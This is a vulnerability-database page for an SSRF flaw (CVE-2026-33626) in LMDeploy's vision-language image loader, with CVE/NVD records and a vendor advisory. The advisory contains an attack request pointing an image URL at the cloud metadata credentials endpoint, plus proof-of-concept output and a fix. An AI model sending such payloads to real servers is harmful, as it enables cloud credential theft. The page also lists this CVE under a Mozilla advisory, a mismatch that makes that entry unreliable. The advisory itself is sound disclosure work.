Vulnerability-Lookup

CVE-2026-33626 (GCVE-0-2026-33626)

Vulnerability from cvelistv5 – Published: 2026-04-20 20:29 – Updated: 2026-04-21 19:50

Title

LMDeploy Vulnerable to Server-Side Request Forgery (SSRF) via Vision-Language Image Loading

Summary

LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

4 references

URL	Tags
https://github.com/InternLM/lmdeploy/security/adv…	x_refsource_CONFIRM
https://github.com/InternLM/lmdeploy/pull/4447	x_refsource_MISC
https://github.com/InternLM/lmdeploy/commit/71d64…	x_refsource_MISC
https://github.com/InternLM/lmdeploy/releases/tag…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
InternLM	lmdeploy	Affected: < 0.12.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33626",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-21T17:52:10.383689Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-21T19:50:13.326Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "lmdeploy",
          "vendor": "InternLM",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.12.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-20T20:29:19.558Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
        },
        {
          "name": "https://github.com/InternLM/lmdeploy/pull/4447",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/InternLM/lmdeploy/pull/4447"
        },
        {
          "name": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626"
        },
        {
          "name": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"
        }
      ],
      "source": {
        "advisory": "GHSA-6w67-hwm5-92mq",
        "discovery": "UNKNOWN"
      },
      "title": "LMDeploy Vulnerable to Server-Side Request Forgery (SSRF) via Vision-Language Image Loading"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33626",
    "datePublished": "2026-04-20T20:29:19.558Z",
    "dateReserved": "2026-03-23T14:24:11.617Z",
    "dateUpdated": "2026-04-21T19:50:13.326Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33626",
      "date": "2026-05-19",
      "epss": "0.02924",
      "percentile": "0.86562"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33626\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-20T21:16:35.097\",\"lastModified\":\"2026-04-23T13:39:54.420\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:internlm:lmdeploy:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.12.3\",\"matchCriteriaId\":\"208E5C1B-F678-46DA-8CF2-34C2525BF666\"}]}]}],\"references\":[{\"url\":\"https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/InternLM/lmdeploy/pull/4447\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"LMDeploy Vulnerable to Server-Side Request Forgery (SSRF) via Vision-Language Image Loading\", \"source\": {\"advisory\": \"GHSA-6w67-hwm5-92mq\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"InternLM\", \"product\": \"lmdeploy\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.12.3\"}]}], \"references\": [{\"url\": \"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq\", \"name\": \"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/InternLM/lmdeploy/pull/4447\", \"name\": \"https://github.com/InternLM/lmdeploy/pull/4447\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626\", \"name\": \"https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3\", \"name\": \"https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-20T20:29:19.558Z\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33626\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-21T17:52:10.383689Z\"}}}], \"references\": [{\"url\": \"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2026-04-21T17:52:24.672Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33626\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-20T20:29:19.558Z\", \"dateReserved\": \"2026-03-23T14:24:11.617Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-20T20:29:19.558Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33626

Vulnerability from fkie_nvd - Published: 2026-04-20 21:16 - Updated: 2026-04-23 13:39

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626	Patch
security-advisories@github.com	https://github.com/InternLM/lmdeploy/pull/4447	Issue Tracking, Patch
security-advisories@github.com	https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3	Release Notes
security-advisories@github.com	https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	internlm	lmdeploy	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:internlm:lmdeploy:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "208E5C1B-F678-46DA-8CF2-34C2525BF666",
              "versionEndExcluding": "0.12.3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue."
    }
  ],
  "id": "CVE-2026-33626",
  "lastModified": "2026-04-23T13:39:54.420",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-20T21:16:35.097",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking",
        "Patch"
      ],
      "url": "https://github.com/InternLM/lmdeploy/pull/4447"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-6W67-HWM5-92MQ

Vulnerability from github – Published: 2026-04-21 15:04 – Updated: 2026-04-21 15:04

Summary

LMDeploy has Server-Side Request Forgery (SSRF) via Vision-Language Image Loading

Details

Summary

A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy's vision-language module. The load_image() function in lmdeploy/vl/utils.py fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources.

Affected Versions

Tested on: main branch (2026-02-04)
Affected: All versions prior to 0.12.3

Vulnerable Code

File: lmdeploy/vl/utils.py (lines 64-67)

def load_image(image_url: Union[str, Image.Image]) -> Image.Image:
    # ...
    if image_url.startswith('http'):
        response = requests.get(image_url, headers=headers, timeout=FETCH_TIMEOUT)
        # NO VALIDATION OF URL/IP BEFORE REQUEST

Also affected: encode_image_base64() function (lines 26-29)

Root Cause

No validation of URLs before fetching
No blocklist for internal IPs (127.0.0.1, 169.254.x.x, 10.x.x.x, 192.168.x.x)
Server binds to 0.0.0.0 by default (api_server.py line 1393)
API keys disabled by default

Attack Scenario

LMDeploy server deployed with vision-language model
Attacker sends request to /v1/chat/completions with malicious image_url:

POST /v1/chat/completions
{
  "model": "internlm-xcomposer2",
  "messages": [{
    "role": "user", 
    "content": [
      {"type": "text", "text": "Describe this image"},
      {"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}}
    ]
  }]
}

Server fetches URL without validation
Attacker receives cloud credentials

Proof of Concept

Verified Exploitation Result

╔═══════════════════════════════════════════════════════════════════════╗
║  LMDeploy SSRF Vulnerability - Proof of Concept                       ║
╚═══════════════════════════════════════════════════════════════════════╝

[1] Starting callback server on port 8889...
[2] Attacker URL: http://127.0.0.1:8889/SSRF_PROOF?stolen_data=AWS_SECRET_KEY
[3] Calling vulnerable load_image() function...

======================================================================
[+] SSRF CALLBACK RECEIVED!
======================================================================
    Time:       2026-02-04 16:10:57
    Path:       /SSRF_PROOF?stolen_data=AWS_SECRET_KEY
    Client:     127.0.0.1:51154
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
======================================================================

✅ SSRF VULNERABILITY CONFIRMED!

Impact

Cloud Credential Theft: Access AWS/GCP/Azure metadata APIs
Internal Service Access: Reach services not exposed to internet
Information Disclosure: Port scan internal networks
Lateral Movement: Pivot point for further attacks

Recommended Fix

from urllib.parse import urlparse
import ipaddress
import socket

BLOCKED_NETWORKS = [
    ipaddress.ip_network('127.0.0.0/8'),
    ipaddress.ip_network('10.0.0.0/8'),
    ipaddress.ip_network('172.16.0.0/12'),
    ipaddress.ip_network('192.168.0.0/16'),
    ipaddress.ip_network('169.254.0.0/16'),
]

def is_safe_url(url: str) -> bool:
    try:
        parsed = urlparse(url)
        if parsed.scheme not in ('http', 'https'):
            return False
        ip = socket.gethostbyname(parsed.hostname)
        ip_addr = ipaddress.ip_address(ip)
        return not any(ip_addr in network for network in BLOCKED_NETWORKS)
    except:
        return False

Credit

This vulnerability was discovered as part of Orca Security's research.

Researcher: Igor Stepansky
Organization: Orca Security
Emails: igor.stepansky@orca.security
iggy.p0pi@orca.security

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "lmdeploy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.12.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33626"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-21T15:04:13Z",
    "nvd_published_at": "2026-04-20T21:16:35Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources.\n\n## Affected Versions\n\n- **Tested on:** main branch (2026-02-04)\n- **Affected:** All versions prior to 0.12.3\n\n## Vulnerable Code\n\n**File:** `lmdeploy/vl/utils.py` (lines 64-67)\n```python\ndef load_image(image_url: Union[str, Image.Image]) -\u003e Image.Image:\n    # ...\n    if image_url.startswith(\u0027http\u0027):\n        response = requests.get(image_url, headers=headers, timeout=FETCH_TIMEOUT)\n        # NO VALIDATION OF URL/IP BEFORE REQUEST\n```\n\n**Also affected:** `encode_image_base64()` function (lines 26-29)\n\n## Root Cause\n\n1. No validation of URLs before fetching\n2. No blocklist for internal IPs (127.0.0.1, 169.254.x.x, 10.x.x.x, 192.168.x.x)\n3. Server binds to `0.0.0.0` by default (api_server.py line 1393)\n4. API keys disabled by default\n\n## Attack Scenario\n\n1. LMDeploy server deployed with vision-language model\n2. Attacker sends request to `/v1/chat/completions` with malicious `image_url`:\n```python\nPOST /v1/chat/completions\n{\n  \"model\": \"internlm-xcomposer2\",\n  \"messages\": [{\n    \"role\": \"user\", \n    \"content\": [\n      {\"type\": \"text\", \"text\": \"Describe this image\"},\n      {\"type\": \"image_url\", \"image_url\": {\"url\": \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"}}\n    ]\n  }]\n}\n```\n\n3. Server fetches URL without validation\n4. Attacker receives cloud credentials\n\n## Proof of Concept\n\n### Verified Exploitation Result\n```\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551  LMDeploy SSRF Vulnerability - Proof of Concept                       \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\n[1] Starting callback server on port 8889...\n[2] Attacker URL: http://127.0.0.1:8889/SSRF_PROOF?stolen_data=AWS_SECRET_KEY\n[3] Calling vulnerable load_image() function...\n\n======================================================================\n[+] SSRF CALLBACK RECEIVED!\n======================================================================\n    Time:       2026-02-04 16:10:57\n    Path:       /SSRF_PROOF?stolen_data=AWS_SECRET_KEY\n    Client:     127.0.0.1:51154\n    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...\n======================================================================\n\n\u2705 SSRF VULNERABILITY CONFIRMED!\n```\n\n## Impact\n\n- **Cloud Credential Theft:** Access AWS/GCP/Azure metadata APIs\n- **Internal Service Access:** Reach services not exposed to internet  \n- **Information Disclosure:** Port scan internal networks\n- **Lateral Movement:** Pivot point for further attacks\n\n## Recommended Fix\n```python\nfrom urllib.parse import urlparse\nimport ipaddress\nimport socket\n\nBLOCKED_NETWORKS = [\n    ipaddress.ip_network(\u0027127.0.0.0/8\u0027),\n    ipaddress.ip_network(\u002710.0.0.0/8\u0027),\n    ipaddress.ip_network(\u0027172.16.0.0/12\u0027),\n    ipaddress.ip_network(\u0027192.168.0.0/16\u0027),\n    ipaddress.ip_network(\u0027169.254.0.0/16\u0027),\n]\n\ndef is_safe_url(url: str) -\u003e bool:\n    try:\n        parsed = urlparse(url)\n        if parsed.scheme not in (\u0027http\u0027, \u0027https\u0027):\n            return False\n        ip = socket.gethostbyname(parsed.hostname)\n        ip_addr = ipaddress.ip_address(ip)\n        return not any(ip_addr in network for network in BLOCKED_NETWORKS)\n    except:\n        return False\n```\n\n---\n\n## Credit\n\nThis vulnerability was discovered as part of Orca Security\u0027s research.\n\n**Researcher:** Igor Stepansky  \n**Organization:** Orca Security  \n**Emails:** \nigor.stepansky@orca.security  \niggy.p0pi@orca.security",
  "id": "GHSA-6w67-hwm5-92mq",
  "modified": "2026-04-21T15:04:13Z",
  "published": "2026-04-21T15:04:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33626"
    },
    {
      "type": "WEB",
      "url": "https://github.com/InternLM/lmdeploy/pull/4447"
    },
    {
      "type": "WEB",
      "url": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/InternLM/lmdeploy"
    },
    {
      "type": "WEB",
      "url": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LMDeploy has Server-Side Request Forgery (SSRF) via Vision-Language Image Loading"
}

WID-SEC-W-2026-1228

Vulnerability from csaf_certbund - Published: 2026-04-21 22:00 - Updated: 2026-04-26 22:00

Summary

Mozilla Thunderbird, Firefox ESR und Firefox: Mehrere Schwachstellen

Severity

Hoch

Notes

Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung: Thunderbird ist ein Open Source E-Mail Client. Firefox ist ein Open Source Web Browser.

Angriff: Ein Angreifer kann mehrere Schwachstellen in Mozilla Thunderbird, Mozilla Firefox ESR und Mozilla Firefox ausnutzen, um seine Privilegien zu erhöhen, um einen Denial of Service Angriff durchzuführen, um Informationen offenzulegen, um falsche Informationen darzustellen, und um Sicherheitsvorkehrungen zu umgehen.

Betroffene Betriebssysteme: - Linux - Sonstiges - UNIX - Windows

CVE-2026-2781

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-33626

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6746

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6747

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6748

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6749

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6750

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
